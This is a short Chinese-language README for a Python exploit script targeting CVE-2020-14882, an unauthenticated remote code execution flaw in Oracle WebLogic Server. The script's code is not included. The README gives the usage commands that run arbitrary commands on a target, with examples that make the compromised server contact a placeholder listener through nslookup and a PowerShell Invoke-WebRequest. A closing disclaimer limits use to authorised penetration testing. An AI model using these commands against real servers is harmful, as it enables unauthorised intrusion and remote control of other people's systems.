此脚本利用未经身份验证的GET请求在Oracle WebLogic Server上实现远程代码执行(RCE)。它利用了漏洞CVE-2020-14882。通过执行任意命令,攻击者可以未经授权地访问服务器。
确保已安装Python 3。要使用此脚本,请按照以下步骤操作:
打开终端或命令提示符。
使用以下命令运行脚本:
python3 exploit.py http(s)://target:7001 command
将 http(s)://target:7001 替换为Oracle WebLogic Server的目标URL,并将 command 替换为要执行的命令。
示例1:
python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
此示例在目标服务器上执行命令 nslookup your_Domain。
示例2:
python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
此示例在目标服务器上执行PowerShell命令 Invoke-WebRequest -Uri http://your_listener。
此脚本仅用于授权的渗透测试和安全研究目的。 未经授权使用此脚本在未获得适当同意的情况下利用系统是非法的,并可能导致法律后果。使用时请自负风险。
此脚本需要以下依赖项:
requestsurllib3请在运行脚本前确保已安装这些依赖项。